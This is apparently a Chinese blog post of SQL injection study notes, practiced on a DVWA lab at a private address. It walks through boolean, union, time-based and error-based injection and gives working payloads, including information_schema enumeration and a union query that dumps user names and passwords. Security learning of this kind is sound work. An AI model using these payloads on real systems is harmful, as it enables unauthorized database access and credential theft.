order by 猜解字段
union联合查询 列数相同

布尔注入 判断条件真假  
猜测闭合 使用单引号或者双引号 ' "
' or 1 =1 -- '

http://192.168.10.157/dvwa/vulnerabilities/sqli/?id='or 1=1 -- '&Submit=Submit#
转码后:
http://192.168.10.157/dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%27&Submit=Submit#
’表示%27
=表示%3D


联合注入 union

—limit 长度
TABLE_CATALOG: NULL
  TABLE_SCHEMA: yazd库名
    TABLE_NAME: yazduserprop表名
    COLUMN_NAME: xxx字段名
    TABLE_TYPE: BASE TABLE
        ENGINE: MyISAM
       VERSION: 10
    ROW_FORMAT: Dynamic
    TABLE_ROWS: 13
AVG_ROW_LENGTH: 30
   DATA_LENGTH: 392
MAX_DATA_LENGTH: 281474976710655
  INDEX_LENGTH: 2048
     DATA_FREE: 0
AUTO_INCREMENT: NULL
   CREATE_TIME: 2012-07-13 16:21:01
   UPDATE_TIME: 2012-07-13 16:26:26
    CHECK_TIME: 2012-07-13 16:26:26
TABLE_COLLATION: latin1_swedish_ci
      CHECKSUM: NULL
CREATE_OPTIONS:
 TABLE_COMMENT:

延时注入 条件查看时间延迟语句是否执行
报错注入 页面返回错误信息

字符型 或者数值型
字符型 1'or '1'='1
数值型 1or 1=1

 

测试sql注入流程

判断是否存在注入点:
1.报错注入:
输入单引号或者反斜杠
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

语法报错 ,说明输入内容没做处理。存在注入点。

2.延时注入盲注:
输入单引号或者反斜杠不显示报错,尝试用sleep方法(1' or sleep(5)-- ‘ )

如网页显示加载状态,判断这里有注入点。


测试查询语句的字段数。
' union select 1 --
如果有报错表示字段数不对,继续追加数值 ' union select 1,2 --   知道不报错

查询相关信息 数据库版本version(),当前用户user() ,当前数据库database()
' union select version() ,user() --


多字段拼接concat
' union select concat(version(),database()),user() --

# mysql 5.0 存在information_schema记录数据库的信息

查询当前用户可查看的数据库
' union select group_concat(table_schema),1 from information_schema.tables --

查询库和表
' union select table_schema,table_name from information_schema.tables where information_schema.tables = database() --

查询users表的字段信息
' union select 1,column_name from information_schema.columns where table_name='users' --

查询账户密码
' union select user,password from users --


1111 union select 1,2 and sleep(5)

 


1111 union select 1,table_name from information_schema.tables where table_schema=database() 查看当前所有表名

 

©著作权归作者所有:来自51CTO博客作者风缘2017的原创作品,如需转载,请注明出处,否则将追究法律责任

更多相关文章

  1. 为何SYSTEM用户可以将V$SESSION的查询权限赋权给其他用户而SYS用
  2. MySQL之left join表查询中发生字符集转换导致表索引失效
  3. 【死磕ibatis】SqlMapClient 基本操作示例
  4. 全文检索技术ElasticSearch使用
  5. 【DB笔试面试618】在Oracle中,“OR扩展”可以有查询转换吗?
  6. 【DB笔试面试619】在Oracle中,举例说明“连接因式分解(Join factor
  7. Python操作SQL Server(三)数据表查询和fetchall()与fetchone()的
  8. Elasticsearch搜索查询语法
  9. MySQL覆盖索引(Covering Index)

随机推荐

  1. js报错:****is not a function 的解决方法
  2. Google地图不显示[重复]
  3. IFrame中的Div没有达到给定的高度
  4. Django和Html有什么区别?
  5. jQuery更改活动类图标的状态
  6. 如何让我的固定宽度移动网站始终显示“完
  7. HTML5用户身份认证源代码:注册、登录、会
  8. Eclipse中以html格式高亮显示velocity文
  9. ExtJS的使用方法汇总(4)——拖放以及弹出
  10. HTML5晃动DeviceMotionEvent事件